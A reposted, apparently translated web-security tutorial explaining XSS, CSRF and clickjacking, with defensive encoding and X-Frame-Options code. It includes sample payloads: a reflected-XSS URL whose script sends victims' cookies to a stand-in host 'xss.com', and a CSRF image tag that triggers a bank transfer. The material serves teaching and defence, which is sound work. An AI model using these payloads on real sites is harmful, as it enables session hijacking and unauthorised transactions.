[Repost] Three offensive and defensive stances on web security

XSS Cross Site Scripting

XSS (Cross Site Scripting): to avoid confusion with the abbreviation for Cascading Style Sheets (CSS), cross-site scripting is abbreviated XSS. A malicious attacker inserts malicious Script code into a Web page; when a user browses that page, the Script code embedded in it is executed, achieving the attacker's malicious purpose.

Classification

  1. Reflected XSS (reflection-based XSS attack)

  2. Stored XSS (storage-based XSS attack)

  3. DOM-based or local XSS (DOM-based or local XSS attack)

Reflected XSS (reflection-based XSS attack)
This type mainly exploits flaws in the way a system echoes (reflects) input back to the user, and tricks the user into actively triggering it, thereby launching the Web attack.

For example:
1. Suppose you search for a product on the shopping site (you.163.com) and the product is not found; the site then shows a "xxx is not listed yet" message, as in the screenshot below.
[Screenshot omitted]
2. In the search box, enter the following and click Search:

“<script>alert('xss')</script>”

3. The back end does not filter the entered data at all and displays it directly on the page, so the string pops up in an alert box.
[Screenshot omitted; the figure is simulated]

The three steps above are only "for fun"; the most critical part of XSS is the fourth step.
4. The attacker can then construct an address that obtains the cookie and spread it through QQ groups or spam, so that other people click on this address:

http://you.163.com/search?keyword=<script>document.location='http://xss.com/get?cookie='+document.cookie</script>

If the deceived user happens to be logged in to the shopping site, that user's login cookie is sent to the attacker's server (xss.com). Of course, the attacker can also carry out more excessive operations.

Stored XSS (storage-based XSS attack)

The difference between Stored XSS and Reflected XSS is that the attack script is saved on the server, so it can be served to and executed by any ordinary user; this gives it the ability to spread across the network.

Another example:

  1. Post an article that contains a malicious script:
    Hello! When you see this text, your information is already unsafe!

  2. The back end does no filtering and saves the article content directly to the database.

  3. When other readers open this article, the malicious script it contains is executed.

Tip: when the whole article is saved as HTML content and the front end does no filtering at display time, this situation is very likely.

(The example here borrows the article title from a blog site.)

If the operation were not just popping up a message, but deleting an article, posting an inflammatory article, or making every reader who views the article follow me and forward it together with the malicious script, would that not have real offensive power?

DOM-based or local XSS (DOM-based or local XSS attack)

DOM, stands for Document Object Model, is a platform and language-neutral interface that allows programs and scripts to dynamically access and update document content, structure and style.

DOM XSS is actually a special kind of reflected XSS: it is a vulnerability based on the DOM (Document Object Model). Page content can be modified dynamically through the DOM, and the DOM obtains data from the client and executes it locally. Because of this characteristic, an XSS vulnerability can be exploited with JS scripts without the payload ever being sent to the server.

DOM properties that may trigger this type of XSS:

document.referrer property

window.name property

location property

innerHTML property

document.write method

······

Summary
In essence, an XSS attack uses whatever means are available to get an attack script executed in the target user's browser.

Prevention
Treat all input and output from the client as untrusted. Before content is added to the DOM or passed to a DOM API, it must be HtmlEncoded or JavaScriptEncoded (according to the context it is placed in) in order to prevent XSS attacks.
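As an added example (not code from the original post or from the NSFOCUS blog), the two encoders the prevention paragraph names, applied to the search-result echo from the reflected-XSS example above. The same encoding rule is what protects the DOM sinks listed in the DOM XSS section: text that is HTML-encoded cannot become markup when it is written with innerHTML or document.write. The render functions, the "not listed yet" wording and the sample payload are constructed for this demonstration.

```javascript
// Added example: context-aware output encoding for untrusted input.
// The render functions and sample inputs are constructed for illustration.

// Encode the five characters that can change HTML structure or close an
// attribute value. Use this for text placed into element content or into a
// quoted attribute (and for anything fed to innerHTML / document.write).
function htmlEncode(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[ch]);
}

// Encode text for placement inside a JavaScript string literal. Every
// non-alphanumeric character becomes \xHH (or \uHHHH), so no input can close
// the quotes or terminate the enclosing <script> block.
function javaScriptEncode(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// The vulnerable pattern from the post: the keyword is echoed straight into
// the page, so a <script> in the keyword becomes a real script element.
function renderNoResultsUnsafe(keyword) {
  return `<p>No results for "${keyword}" (not listed yet)</p>`;
}

// Hardened version: the keyword is HTML-encoded before concatenation.
function renderNoResultsSafe(keyword) {
  return `<p>No results for "${htmlEncode(keyword)}" (not listed yet)</p>`;
}

// Hardened version for the JavaScript context: the keyword is stored in an
// inline script, so it is wrapped in a quoted literal and JavaScript-encoded.
function renderLastSearchScript(keyword) {
  return `<script>var lastSearch = '${javaScriptEncode(keyword)}';</script>`;
}

// Crude check used only to show the difference between the two renderings:
// does the produced HTML still contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

const constructedPayload = "<script>alert('xss')</script>";
console.log(renderNoResultsUnsafe(constructedPayload));   // script survives
console.log(renderNoResultsSafe(constructedPayload));     // rendered as text
console.log(renderLastSearchScript(constructedPayload));  // only the wrapper tag remains
```

The point of having two encoders is that the encoding must match the context: HTML-encoding a value that lands inside a script string does not stop a quote from closing the literal, and JavaScript-encoding a value that lands in element content does not stop angle brackets from becoming tags. When the target is a DOM node, assigning to textContent instead of innerHTML achieves the same effect as htmlEncode without string building.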

CSRF (Cross-site request forgery)

CSRF (Cross-site request forgery), also known as "One Click Attack" or Session Riding and usually abbreviated CSRF or XSRF, is a malicious exploitation of a website. Although it sounds like cross-site scripting (XSS), it is very different: XSS exploits the user's trust in the site, whereas CSRF exploits the site's trust in the user by disguising a request as coming from a trusted user. Compared with XSS, CSRF attacks are not very popular (so resources for guarding against them are quite scarce) and are difficult to defend against, which is why CSRF is considered more dangerous than XSS. And it is often committed together with XSS!

The details in this section are adapted from hyddd's blog post http://www.cnblogs.com/hyddd/...; the example is partly transcribed from it with some changes. Tribute and thanks to the author hyddd.

What can CSRF do?

A CSRF attack can be understood as: the attacker steals your identity and sends malicious requests in your name. Things CSRF can do include sending e-mail and messages in your name, stealing your account, and even purchasing goods or transferring virtual currency...... The resulting problems include leakage of personal privacy and threats to property safety.

Status of CSRF vulnerabilities

This kind of CSRF attack was proposed by foreign security researchers in 2000, but domestically it only began to receive attention in 2006. In 2008 a number of large community and interactive websites at home and abroad were found to have CSRF vulnerabilities, such as NYTimes.com (New York Times), Metafilter (a large blog site), YouTube and Baidu HI...... Today many sites on the Internet are still unprepared for it, which is why the security industry calls CSRF a "sleeping giant".

CSRF principle

The figure below illustrates the basic idea of a CSRF attack:
[Figure omitted]
As can be seen from the figure, to complete a CSRF attack the victim must complete two steps in sequence:

  1. Log in to trusted website A, generating a cookie locally.
  2. Without logging out of A, visit dangerous website B.

Seeing this, you might say: "If I do not satisfy one of the two conditions above, I will not be attacked by CSRF." Yes, that is true, but you cannot guarantee that the following situations will not occur:

  1. You cannot guarantee that after logging in to one website you will not open another tab and visit a different website.
  2. You cannot guarantee that after you close the browser your local cookies expire immediately and your previous session has ended. (In fact, closing the browser does not end a session, but most people mistakenly assume that closing the browser is the same as logging out / ending the session......)
  3. The so-called attack website in the figure above may be a trusted, frequently visited website that happens to have other vulnerabilities.

Example

The idea of a CSRF attack was described roughly above; below I will use a few examples to describe concrete CSRF attacks in detail. Here I use a bank transfer operation as the example (it is only an example; real bank websites are not this naive :>)

Example 1

Bank website A completes bank transfers with a GET request, for example: http://www.mybank.com/Transfe…

Dangerous website B contains the following piece of HTML code:

<img src=http://www.mybank.com/Transfer.php?toBankId=11&money=1000>

First you log in to bank website A, then you visit dangerous website B. Oh, at this point you will find that your bank account is 1000 short......

Why does this happen? The reason is that bank website A violates the HTTP specification by using a GET request to update a resource. Before visiting dangerous website B you had already logged in to bank website A, and B requests a third-party resource via GET (the third party here is the bank website; originally this is a legitimate request, but here it is exploited by a criminal), so your browser sends the GET request carrying your cookie for bank website A in order to fetch the resource

http://www.mybank.com/Transfer.php?toBankId=11&money=1000
After receiving the request, the bank website server treats it as a resource update operation (a transfer) and immediately performs the transfer......

In fact, it can be seen that CSRF attacks stem from the Web's implicit authentication mechanism! Although the Web's authentication mechanism can guarantee that a request comes from a certain user's browser, it cannot guarantee that the request was approved and sent by that user!

Current strategies for defending against CSRF

In the industry there are currently three main strategies for defending against CSRF attacks: validating the HTTP Referer field; adding a token to the request address and validating it; and adding a custom attribute to the HTTP header and validating it. The three strategies are introduced in detail below.

Validating the HTTP Referer field

Use the Referer in the HTTP header to judge whether the source of the request is legitimate.

Advantages:
Simple and easy to implement: you only need to add one interceptor at the end that checks the Referer value for all security-sensitive requests. Especially for existing systems, no existing code or logic has to be changed, there is no risk, and it is very convenient.

Disadvantages:

  1. The Referer value is supplied by the browser and cannot be fully trusted; in older browser versions the Referer can be forged.
  2. Users can configure their browser so that it no longer sends the Referer, in which case the website will reject legitimate users.

Adding a token to the request address and validating it

Put information into the request that the attacker cannot forge, and which does not exist in the cookie: add a randomly generated token as an HTTP request parameter and have the server validate it.

Advantages: somewhat safer than checking the Referer, and does not involve user privacy.

Disadvantages: adding the token to every request is relatively difficult; it is hard to guarantee the security of the token itself, and the token can still be obtained and exploited.

Custom attribute in the HTTP header with validation + One-Time Tokens

Put the token into a custom attribute of the HTTP header. It is sent with an XMLHttpRequest asynchronous request, validated by the back end, and valid only once.

Advantages: token input and output are managed in one place, so the security of the token can be guaranteed.

Disadvantages: limited applicability; it cannot be applied to non-asynchronous requests.

Clickjacking

Clickjacking, also called a UI redress attack, is an attack in which the attacker uses one or more transparent or opaque layers to trick the user into clicking a button, while the actual click lands on a button the user cannot see, so that the attack is carried out without the user's knowledge.

The key to this attack is the iframe tag, which embeds a page within a page, and CSS stylesheets can be used to make it invisible.
[Figure omitted: layered page diagram]
As with the blue layer in the schematic above, the attacker uses some means to entice the user to enter information "in the red layer", while the user is actually acting in the blue layer; this is how the deception works.

Take Alipay as an example
[Screenshot omitted]
Yes, this one is my forgery. If I hide the real top-up site on top of this interface... I think the clever reader already understands the danger of clickjacking.

[Screenshot omitted]
In the image above I roughly offset the layers and reduced the opacity. Isn't it interesting? A confused user thinks they are claiming a prize, when in fact they are topping up a stranger's phone credit.

The most common attack scenario for this method is forging websites to steal account information, such as the account names and passwords of Alipay, QQ, NetEase and other accounts.
[Screenshots omitted]
At present clickjacking is still relatively obscure, and many websites with weak security awareness have not yet started defending against it. This is very dangerous.

Prevention

There are two main ways to prevent clickjacking:

X-FRAME-OPTIONS

X-FRAME-OPTIONS is an HTTP header proposed by Microsoft that instructs the browser not to allow the page to be framed from other domains; it is specifically designed to defend against clickjacking attacks that use iframe nesting. It is well supported in IE8, Firefox 3.6, Chrome 4 and later versions.

This header has three values:

DENY // refuse loading from any domain

SAMEORIGIN // allow loading only from the same origin

ALLOW-FROM // specify the page address allowed to load the frame

Top-level check

Use defensive code in the UI to ensure that the current frame is the top-level window.

There are several methods, such as

top != self || top.location != self.location || top.location != location
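As an added example (not code from the original post or from the NSFOCUS blog), the X-FRAME-OPTIONS header built for a sensitive page and evaluated the way a browser applies it, alongside the top-level check written as a function over a window-like object so the logic can be exercised outside a browser. The origins, the helper names and the Content-Security-Policy companion header are additions made for this demonstration.

```javascript
// Added example: building and evaluating X-Frame-Options, plus the
// top-level check. Origins and helper names are constructed for illustration.

const XFO_VALUES = ['DENY', 'SAMEORIGIN', 'ALLOW-FROM'];

// Build the header value for a response. ALLOW-FROM takes exactly one origin.
// ALLOW-FROM is a legacy form that not every browser honors, so DENY or
// SAMEORIGIN should be preferred whenever the page does not need framing.
function buildXFrameOptions(policy, allowFromOrigin) {
  const p = String(policy).toUpperCase();
  if (!XFO_VALUES.includes(p)) throw new Error('unknown X-Frame-Options policy: ' + policy);
  if (p === 'ALLOW-FROM') {
    if (!allowFromOrigin) throw new Error('ALLOW-FROM requires an origin');
    return 'ALLOW-FROM ' + new URL(allowFromOrigin).origin;
  }
  return p;
}

// Evaluate the header as a browser would: may a document served from
// `pageOrigin` with this header be rendered inside a frame whose top-level
// document has origin `topOrigin`? A top-level load (topOrigin === null) is
// never blocked, and a missing header means anyone may frame the page.
function framingAllowed(headerValue, pageOrigin, topOrigin) {
  if (topOrigin === null) return true;
  if (!headerValue) return true;
  const [policy, arg] = headerValue.trim().split(/\s+/);
  switch (policy.toUpperCase()) {
    case 'DENY': return false;
    case 'SAMEORIGIN': return topOrigin === pageOrigin;
    case 'ALLOW-FROM': return topOrigin === pageOrigin || topOrigin === arg;
    default: return true; // unrecognized values are ignored by browsers
  }
}

// Response headers for a sensitive page such as a top-up or transfer form.
// frame-ancestors is the CSP Level 2 equivalent and is added as a second,
// modern control beside the header the post describes.
function protectiveHeaders() {
  return {
    'X-Frame-Options': buildXFrameOptions('DENY'),
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// The post's top-level check, as a predicate over a window-like object: the
// page is framed when `top` is not the very same object as `self`. In a real
// page this would be followed by  if (isFramed(window)) top.location = self.location;
function isFramed(win) {
  return win.top !== win.self;
}
```

The header is the robust control, because the browser enforces it before any of the page's own script runs; the top-level check is a fallback for the browsers the post lists as lacking support, and it can be defeated by a hostile parent frame, so the two should be used together rather than the check alone.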

Reposted from the NSFOCUS blog; original link: http://blog.nsfocus.net/offensive-defensive-stances-web-security/


Origin www.cnblogs.com/zouwangblog/p/11113054.html